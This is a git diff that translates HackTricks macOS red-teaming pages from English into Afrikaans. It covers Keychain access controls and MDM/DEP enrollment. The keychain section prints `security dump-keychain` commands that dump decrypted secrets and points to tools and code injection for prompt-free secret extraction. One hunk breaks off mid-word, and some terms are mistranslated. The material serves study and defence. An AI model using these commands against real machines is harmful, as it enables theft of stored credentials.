-## References +## Verwysings * [**https://www.youtube.com/watch?v=IiMladUbL6E**](https://www.youtube.com/watch?v=IiMladUbL6E) * [**https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6**](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6) @@ -223,14 +215,14 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index ba70c4c90..7e72788e7 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -1,72 +1,71 @@ -# macOS Keychain +# macOS Sleutelbos
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Main Keychains +## Hoof Sleutelbosse -* The **User Keychain** (`~/Library/Keychains/login.keycahin-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys. -* The **System Keychain** (`/Library/Keychains/System.keychain`), which stores **system-wide credentials** such as WiFi passwords, system root certificates, system private keys, and system application passwords. +* Die **Gebruiker Sleutelbos** (`~/Library/Keychains/login.keycahin-db`), wat gebruik word om **gebruikerspesifieke geloofsbriewe** soos toepassingswagwoorde, internetwagwoorde, gebruikers gegenereerde sertifikate, netwerkwagwoorde en gebruikers gegenereerde openbare/privaat sleutels te stoor. +* Die **Stelsel Sleutelbos** (`/Library/Keychains/System.keychain`), wat **stelselwye geloofsbriewe** soos WiFi-wagwoorde, stelsel-rootsertifikate, stelsel private sleutels en stelseltoepassingswagwoorde stoor. -### Password Keychain Access +### Toegang tot Sleutelbos Wagwoorde -These files, while they do not have inherent protection and can be **downloaded**, are encrypted and require the **user's plaintext password to be decrypted**. A tool like [**Chainbreaker**](https://github.com/n0fate/chainbreaker) could be used for decryption. +Hierdie lêers, alhoewel hulle nie inherente beskerming het en **afgelaai** kan word nie, is versleutel en vereis die **gebruiker se platte tekst wagwoord om ontsluit** te word. 'n Hulpmiddel soos [**Chainbreaker**](https://github.com/n0fate/chainbreaker) kan gebruik word vir ontsleuteling. -## Keychain Entries Protections +## Sleutelbosinskrywingsbeskerming -### ACLs +### ACL's -Each entry in the keychain is governed by **Access Control Lists (ACLs)** which dictate who can perform various actions on the keychain entry, including: +Elke inskrywing in die sleutelbos word beheer deur **Toegangsbeheerlyste (ACL's)** wat bepaal wie verskeie aksies op die sleutelbosinskrywing kan uitvoer, insluitend: -* **ACLAuhtorizationExportClear**: Allows the holder to get the clear text of the secret. -* **ACLAuhtorizationExportWrapped**: Allows the holder to get the clear text encrypted with another provided password. -* **ACLAuhtorizationAny**: Allows the holder to perform any action. +* **ACLAuhtorizationExportClear**: Laat die houer toe om die geheime teks te kry. +* **ACLAuhtorizationExportWrapped**: Laat die houer toe om die geheime teks versleutel met 'n ander voorsiene wagwoord te kry. +* **ACLAuhtorizationAny**: Laat die houer toe om enige aksie uit te voer. -The ACLs are further accompanied by a **list of trusted applications** that can perform these actions without prompting. This could be: +Die ACL's word verder vergesel deur 'n **lys van vertroude toepassings** wat hierdie aksies sonder 'n versoek kan uitvoer. Dit kan wees: -* **N`il`** (no authorization required, **everyone is trusted**) -* An **empty** list (**nobody** is trusted) -* **List** of specific **applications**. +* **N`il`** (geen toestemming vereis, **almal is vertrou**) +* 'n **Leë** lys (**niemand** is vertrou) +* **Lys** van spesifieke **toepassings**. -Also the entry might contain the key **`ACLAuthorizationPartitionID`,** which is use to identify the **teamid, apple,** and **cdhash.** +Die inskrywing kan ook die sleutel **`ACLAuthorizationPartitionID`** bevat, wat gebruik word om die **teamid, apple,** en **cdhash** te identifiseer. -* If the **teamid** is specified, then in order to **access the entry** value **withuot** a **prompt** the used application must have the **same teamid**. -* If the **apple** is specified, then the app needs to be **signed** by **Apple**. -* If the **cdhash** is indicated, then **app** must have the specific **cdhash**. +* As die **teamid** gespesifiseer is, moet die gebruikte toepassing dieselfde **teamid** hê om toegang tot die inskrywingwaarde **sonder** 'n versoek te verkry. +* As die **apple** aangedui is, moet die toepassing deur **Apple** onderteken word. +* As die **cdhash** aangedui word, moet die toepassing die spesifieke **cdhash** hê. -### Creating a Keychain Entry +### Die Skep van 'n Sleutelbosinskrywing -When a **new** **entry** is created using **`Keychain Access.app`**, the following rules apply: +Wanneer 'n **nuwe** **inskrywing** geskep word met behulp van **`Keychain Access.app`**, geld die volgende reëls: -* All apps can encrypt. -* **No apps** can export/decrypt (without prompting the user). -* All apps can see the integrity check. -* No apps can change ACLs. -* The **partitionID** is set to **`apple`**. +* Alle toepassings kan versleutel. +* **Geen toepassings** kan uitvoer/ontsleutel nie (sonder om die gebruiker te versoek). +* Alle toepassings kan die integriteitskontrole sien. +* Geen toepassings kan ACL's verander nie. +* Die **partitionID** word ingestel op **`apple`**. -When an **application creates an entry in the keychain**, the rules are slightly different: +Wanneer 'n **toepassing 'n inskrywing in die sleutelbos skep**, is die reëls effens anders: -* All apps can encrypt. -* Only the **creating application** (or any other apps explicitly added) can export/decrypt (without prompting the user). -* All apps can see the integrity check. -* No apps can change the ACLs. -* The **partitionID** is set to **`teamid:[teamID here]`**. +* Alle toepassings kan versleutel. +* Slegs die **skeppende toepassing** (of enige ander toepassings wat eksplisiet bygevoeg is) kan uitvoer/ontsleutel (sonder om die gebruiker te versoek). +* Alle toepassings kan die integriteitskontrole sien. +* Geen toepassings kan ACL's verander nie. +* Die **partitionID** word ingestel op **`teamid:[teamID hier]`**. -## Accessing the Keychain +## Toegang tot die Sleutelbos ### `security` - ```bash # Dump all metadata and decrypted secrets (a lot of pop-ups) security dump-keychain -a -d @@ -77,73 +76,72 @@ security find-generic-password -a "Slack" -g # Change the specified entrys PartitionID entry security set-generic-password-parition-list -s "test service" -a "test acount" -S ``` - ### APIs {% hint style="success" %} -The **keychain enumeration and dumping** of secrets that **won't generate a prompt** can be done with the tool [**LockSmith**](https://github.com/its-a-feature/LockSmith) +Die **sleutelketting enumerasie en dump** van geheime wat **nie 'n vraag sal genereer** nie, kan gedoen word met die instrument [**LockSmith**](https://github.com/its-a-feature/LockSmith) {% endhint %} -List and get **info** about each keychain entry: +Lys en kry **inligting** oor elke sleutelkettinginskrywing: -* The API **`SecItemCopyMatching`** gives info about each entry and there are some attributes you can set when using it: - * **`kSecReturnData`**: If true, it will try to decrypt the data (set to false to avoid potential pop-ups) - * **`kSecReturnRef`**: Get also reference to keychain item (set to true in case later you see you can decrypt without pop-up) - * **`kSecReturnAttributes`**: Get metadata about entries - * **`kSecMatchLimit`**: How many results to return - * **`kSecClass`**: What kind of keychain entry +* Die API **`SecItemCopyMatching`** gee inligting oor elke inskrywing en daar is sekere eienskappe wat jy kan instel wanneer jy dit gebruik: +* **`kSecReturnData`**: As waar, sal dit probeer om die data te ontsluit (stel dit in as vals om potensiële opduikende vensters te vermy) +* **`kSecReturnRef`**: Kry ook verwysing na sleutelkettingitem (stel dit in as waar in die geval dat jy sien jy kan ontsluit sonder opduikende venster) +* **`kSecReturnAttributes`**: Kry metadata oor inskrywings +* **`kSecMatchLimit`**: Hoeveel resultate om terug te gee +* **`kSecClass`**: Watter soort sleutelkettinginskrywing -Get **ACLs** of each entry: +Kry **ACL's** van elke inskrywing: -* With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has: - * Description - * **Trusted Application List**. This could be: - * An app: /Applications/Slack.app - * A binary: /usr/libexec/airportd - * A group: group://AirPort +* Met die API **`SecAccessCopyACLList`** kan jy die **ACL vir die sleutelkettingitem** kry, en dit sal 'n lys van ACL's teruggee (soos `ACLAuhtorizationExportClear` en die ander voorheen genoemde) waar elke lys het: +* Beskrywing +* **Vertroude Aansoeklys**. Dit kan wees: +* 'n Toepassing: /Applications/Slack.app +* 'n Binêre: /usr/libexec/airportd +* 'n Groep: group://AirPort -Export the data: +Voer die data uit: -* The API **`SecKeychainItemCopyContent`** gets the plaintext -* The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted +* Die API **`SecKeychainItemCopyContent`** kry die platte teks +* Die API **`SecItemExport`** voer die sleutels en sertifikate uit, maar moontlik moet wagwoorde gestel word om die inhoud versleutel uit te voer -And these are the **requirements** to be able to **export a secret without a prompt**: +En hier is die **vereistes** om 'n geheim sonder 'n vraag uit te voer: -* If **1+ trusted** apps listed: - * Need the appropriate **authorizations** (**`Nil`**, or be **part** of the allowed list of apps in the authorization to access the secret info) - * Need code signature to match **PartitionID** - * Need code signature to match that of one **trusted app** (or be a member of the right KeychainAccessGroup) -* If **all applications trusted**: - * Need the appropriate **authorizations** - * Need code signature to match **PartitionID** - * If **no PartitionID**, then this isn't needed +* As daar **1+ vertroude** programme gelys word: +* Benodig die toepaslike **magtigings** (**`Nil`**, of wees deel van die toegelate lys van programme in die magtiging om toegang tot die geheime inligting te verkry) +* Benodig kodehandtekening om ooreen te stem met **PartitionID** +* Benodig kodehandtekening om ooreen te stem met dié van een **vertroude toepassing** (of wees 'n lid van die regte KeychainAccessGroup) +* As **alle programme vertrou** word: +* Benodig die toepaslike **magtigings** +* Benodig kodehandtekening om ooreen te stem met **PartitionID** +* As daar **geen PartitionID** is, is dit nie nodig nie {% hint style="danger" %} -Therefore, if there is **1 application listed**, you need to **inject code in that application**. +Daarom, as daar **1 aansoek gelys** word, moet jy **kode in daardie aansoek inspuit**. -If **apple** is indicated in the **partitionID**, you could access it with **`osascript`** so anything that is trusting all applications with apple in the partitionID. **`Python`** could also be used for this. +As **apple** aangedui word in die **partitionID**, kan jy dit met **`osascript`** toegang kry, sodat enige iets wat alle programme met apple in die partitionID vertrou. **`Python`** kan ook hiervoor gebruik word. {% endhint %} -### Two additional attributes +### Twee addisionele eienskappe -* **Invisible**: It's a boolean flag to **hide** the entry from the **UI** Keychain app -* **General**: It's to store **metadata** (so it's NOT ENCRYPTED) - * Microsoft was storing in plain text all the refresh tokens to access sensitive endpoint. +* **Onsigbaar**: Dit is 'n booleaanse vlag om die inskrywing van die **UI** Sleutelketting-toepassing te **versteek** +* **Algemeen**: Dit is om **metadata** te stoor (dit is NIE VERSLEUTELD nie) +* Microsoft het al die verfrissingsnommers om toegang tot sensitiewe eindpunte te verkry, in platte teks gestoor. -## References +## Verwysings * [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md index 24002a521..c99ad0b84 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -2,226 +2,189 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**To learn about macOS MDMs check:** +**Om meer te leer oor macOS MDM's, kyk na:** * [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) * [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe) -## Basics +## Basiese beginsels -### **MDM (Mobile Device Management) Overview** -[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) is utilized for overseeing various end-user devices like smartphones, laptops, and tablets. Particularly for Apple's platforms (iOS, macOS, tvOS), it involves a set of specialized features, APIs, and practices. The operation of MDM hinges on a compatible MDM server, which is either commercially available or open-source, and must support the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Key points include: +### **MDM (Mobile Device Management) Oorsig** +[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) word gebruik om verskeie eindgebruikerstoestelle soos slimfone, draagbare rekenaars en tablette te bestuur. Veral vir Apple se platforms (iOS, macOS, tvOS) behels dit 'n stel gespesialiseerde funksies, API's en praktyke. Die werking van MDM steun op 'n verenigbare MDM-bediener, wat of kommersieel beskikbaar is of oopbron is, en moet die [MDM-protokol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) ondersteun. Sleutelpunte sluit in: -- Centralized control over devices. -- Dependence on an MDM server that adheres to the MDM protocol. -- Capability of the MDM server to dispatch various commands to devices, for instance, remote data erasure or configuration installation. +- Gekentraliseerde beheer oor toestelle. +- Afhanklikheid van 'n MDM-bediener wat die MDM-protokol nakom. +- Die vermoë van die MDM-bediener om verskeie opdragte na toestelle te stuur, byvoorbeeld verwydering van afgelewerde data of konfigurasie-installasie. -### **Basics of DEP (Device Enrollment Program)** -The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) offered by Apple streamlines the integration of Mobile Device Management (MDM) by facilitating zero-touch configuration for iOS, macOS, and tvOS devices. DEP automates the enrollment process, allowing devices to be operational right out of the box, with minimal user or administrative intervention. Essential aspects include: +### **Basiese beginsels van DEP (Device Enrollment Program)** +Die [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) wat deur Apple aangebied word, vereenvoudig die integrasie van Mobile Device Management (MDM) deur outomatiese konfigurasie vir iOS-, macOS- en tvOS-toestelle te fasiliteer. DEP outomatiseer die registrasieproses, sodat toestelle reguit uit die boks gebruik kan word, met minimale gebruikers- of administratiewe ingryping. Belangrike aspekte sluit in: -- Enables devices to autonomously register with a pre-defined MDM server upon initial activation. -- Primarily beneficial for brand-new devices, but also applicable for devices undergoing reconfiguration. -- Facilitates a straightforward setup, making devices ready for organizational use swiftly. +- Stel toestelle in staat om outomaties by 'n voorafbepaalde MDM-bediener te registreer by aanvanklike aktivering. +- Hoofsaaklik voordelig vir splinternuwe toestelle, maar ook toepaslik vir toestelle wat herkonfigurasie ondergaan. +- Vereenvoudig 'n maklike opstelling, sodat toestelle vinnig gereed is vir organisatoriese gebruik. -### **Security Consideration** -It's crucial to note that the ease of enrollment provided by DEP, while beneficial, can also pose security risks. If protective measures are not adequately enforced for MDM enrollment, attackers might exploit this streamlined process to register their device on the organization's MDM server, masquerading as a corporate device. +### **Veiligheidsoorwegings** +Dit is belangrik om daarop te let dat die maklike registrasie wat deur DEP gebied word, terwyl dit voordelig is, ook sekuriteitsrisiko's kan inhou. As beskermingsmaatreëls nie behoorlik afgedwing word vir MDM-registrasie nie, kan aanvallers hierdie vereenvoudigde proses benut om hul toestel op die organisasie se MDM-bediener te registreer en as 'n korporatiewe toestel voor te gee. {% hint style="danger" %} -**Security Alert**: Simplified DEP enrollment could potentially allow unauthorized device registration on the organization's MDM server if proper safeguards are not in place. +**Veiligheidswaarskuwing**: Vereenvoudigde DEP-registrasie kan potensieel ongemagtigde toestelregistrasie op die organisasie se MDM-bediener toelaat as behoorlike veiligheidsmaatreëls nie in plek is nie. {% endhint %} -### Basics What is SCEP (Simple Certificate Enrolment Protocol)? +### Basiese beginsels Wat is SCEP (Simple Certificate Enrolment Protocol)? -* A relatively old protocol, created before TLS and HTTPS were widespread. -* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate. +* 'n Relatief ou protokol, geskep voordat TLS en HTTPS wydverspreid was. +* Gee kliënte 'n gestandaardiseerde manier om 'n **Certificate Signing Request** (CSR) te stuur om 'n sertifikaat toegeken te word. Die kliënt sal die bediener vra om hom 'n ondertekende sertifikaat te gee. -### What are Configuration Profiles (aka mobileconfigs)? +### Wat is Konfigurasieprofiel (aka mobileconfigs)? -* Apple’s official way of **setting/enforcing system configuration.** -* File format that can contain multiple payloads. -* Based on property lists (the XML kind). -* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018. +* Apple se amptelike manier om **sisteme-konfigurasie in te stel/af te dwing**. +* Lêerformaat wat verskeie ladinge kan bevat. +* Gebaseer op eiendomslyste (die XML-soort). +* "kan onderteken en versleutel word om hul oorsprong te valideer, hul integriteit te verseker en hul inhoud te beskerm." Basics — Bladsy 70, iOS Security Guide, Januarie 2018. -## Protocols +## Protokolle ### MDM -* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers) -* **Communication** occurs between a **device** and a server associated with a **device** **management** **product** -* **Commands** delivered from the MDM to the device in **plist-encoded dictionaries** -* All over **HTTPS**. MDM servers can be (and are usually) pinned. -* Apple grants the MDM vendor an **APNs certificate** for authentication +* Kombinasie van APNs (**Apple-bedieners**) + RESTful API (**MDM-vennoot**-bedieners) +* **Kommunikasie** vind plaas tussen 'n **toestel** en 'n bediener wat verband hou met 'n **toestelbestuursproduk** +* **Opdragte** word van die MDM na die toestel gestuur in **plist-gekodeerde woordeboeke** +* Alles oor **HTTPS**. MDM-bedieners kan (en word gewoonlik) vasgemaak. +* Apple verleen die MDM-vennoot 'n **APNs-sertifikaat** vir verifikasie ### DEP -* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented): - * The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices. - * The [DEP API used by Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) to enroll devices, check enrollment status, and check transaction status. - * The undocumented private DEP API. This is used by Apple Devices to request their DEP profile. On macOS, the `cloudconfigurationd` binary is responsible for communicating over this API. -* More modern and **JSON** based (vs. plist) -* Apple grants an **OAuth token** to the MDM vendor +* **3 API's**: 1 vir wederverkopers, 1 vir MDM-vennote, 1 vir toestelidentiteit (ondokumenteer): +* Die sogenaamde [DEP "wolkmeganisme" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Dit word deur MDM-bedieners gebruik om DEP-profiel met spesifieke toestelle te assosieer. +* Die [DEP API wat deur Apple Gemagtigde Wederverkopers gebruik word](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) om toestelle in te skryf, inskrywingsstatus te kontroleer en transaksiestatus te kontroleer. +* Die ongedokumenteerde private DEP API. Dit word deur Apple-toestelle gebruik om hul DEP-profiel aan te vra. Op macOS is die `cloudconfigurationd` binêre verantwoordelik vir kommunikasie oor hierdie API. +* Meer moderne en **JSON**-gebaseerd (vs. plist) +* Apple verleen 'n **OAuth-token** aan die MDM-vennoot -**DEP "cloud service" API** +**DEP "wolkmeganisme" API** * RESTful -* sync device records from Apple to the MDM server -* sync “DEP profiles” to Apple from the MDM server (delivered by Apple to the device later on) -* A DEP “profile” contains: - * MDM vendor server URL - * Additional trusted certificates for server URL (optional pinning) - * Extra settings (e.g. which screens to skip in Setup Assistant) +* sink toestelrekords van Apple na die MDM-bediener +* sink "DEP-profiel" na Apple van die MDM-bediener (later deur Apple aan die toestel afgelewer) +* 'n DEP "profiel" bevat: +* MDM-vennoot-bediener-URL +* Addisionele vertrouensertifikate vir bediener-URL (opsionele vaspen) +* Ekstra instellings (bv. watter skerms om oor te slaan in die Assistent vir Opstelling) -## Serial Number +## Serienommer -Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. +Apple-toestelle wat na 2010 vervaardig is, het oor die algemeen **12-karakter alfanumeriese** serienommers, met die **eerste drie syfers wat die vervaardigingsplek** verteenwoordig, die volgende **twee** wat die **jaar** en **week** van vervaardiging aandui, die volgende **drie** syfers wat 'n **unieke identifiseerder** verskaf, en die **laaste** **vier** syfers wat die **modelnommer** verteenwoordig. {% content-ref url="macos-serial-number.md" %} [macos-serial-number.md](macos-serial-number.md) {% endcontent-ref %} -## Steps for enrolment and management +## Stappe vir inskrywing en bestuur -1. Device record creation (Reseller, Apple): The record for the new device is created -2. Device record assignment (Customer): The device is assigned to a MDM server -3. Device record sync (MDM vendor): MDM sync the device records and push the DEP profiles to Apple -4. DEP check-in (Device): Device gets his DEP profile -5. Profile retrieval (Device) -6. Profile installation (Device) a. incl. MDM, SCEP and root CA payloads -7. MDM command issuance (Device) +1. Ske +### Stap 4: DEP kontrole - Kry die Aktiveringsrekord -![](<../../../.gitbook/assets/image (564).png>) - -The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process. - -### Step 4: DEP check-in - Getting the Activation Record - -This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe) +Hierdie deel van die proses gebeur wanneer 'n **gebruiker 'n Mac vir die eerste keer opstart** (of na 'n volledige uitvee) ![](<../../../.gitbook/assets/image (568).png>) -or when executing `sudo profiles show -type enrollment` +of wanneer die `sudo profiles show -type enrollment` uitgevoer word -* Determine **whether device is DEP enabled** -* Activation Record is the internal name for **DEP “profile”** -* Begins as soon as the device is connected to Internet -* Driven by **`CPFetchActivationRecord`** -* Implemented by **`cloudconfigurationd`** via XPC. The **"Setup Assistant**" (when the device is firstly booted) or the **`profiles`** command will **contact this daemon** to retrieve the activation record. - * LaunchDaemon (always runs as root) +* Bepaal **of die toestel DEP-geaktiveer is** +* Aktiveringsrekord is die interne naam vir die **DEP "profiel"** +* Begin sodra die toestel aan die internet gekoppel is +* Gedryf deur **`CPFetchActivationRecord`** +* Geïmplementeer deur **`cloudconfigurationd`** via XPC. Die **"Setup Assistant**" (wanneer die toestel eerste keer opgestart word) of die **`profiles`** opdrag sal **hierdie daemon kontak** om die aktiveringsrekord te kry. +* LaunchDaemon (loop altyd as root) -It follows a few steps to get the Activation Record performed by **`MCTeslaConfigurationFetcher`**. This process uses an encryption called **Absinthe** +Dit volg 'n paar stappe om die Aktiveringsrekord uit te voer deur **`MCTeslaConfigurationFetcher`**. Hierdie proses maak gebruik van 'n versleuteling genaamd **Absinthe** -1. Retrieve **certificate** - 1. GET [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) -2. **Initialize** state from certificate (**`NACInit`**) - 1. Uses various device-specific data (i.e. **Serial Number via `IOKit`**) -3. Retrieve **session key** - 1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) -4. Establish the session (**`NACKeyEstablishment`**) -5. Make the request - 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` - 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) - 3. All requests over HTTPs, built-in root certificates are used +1. Kry **sertifikaat** +1. Kry [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) +2. **Inisialiseer** toestand vanaf sertifikaat (**`NACInit`**) +1. Gebruik verskillende toestel-spesifieke data 